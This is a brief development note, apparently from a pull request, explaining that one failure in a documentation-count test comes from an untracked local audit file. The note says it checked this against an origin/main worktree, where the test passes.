`tests/test-doc-counts.sh` reports one failure, on an untracked local-only file under `docs/audits/` that quotes historical module counts. It is not part of this branch and does not reach CI — confirmed by running the same check against an `origin/main` worktree, where it passes.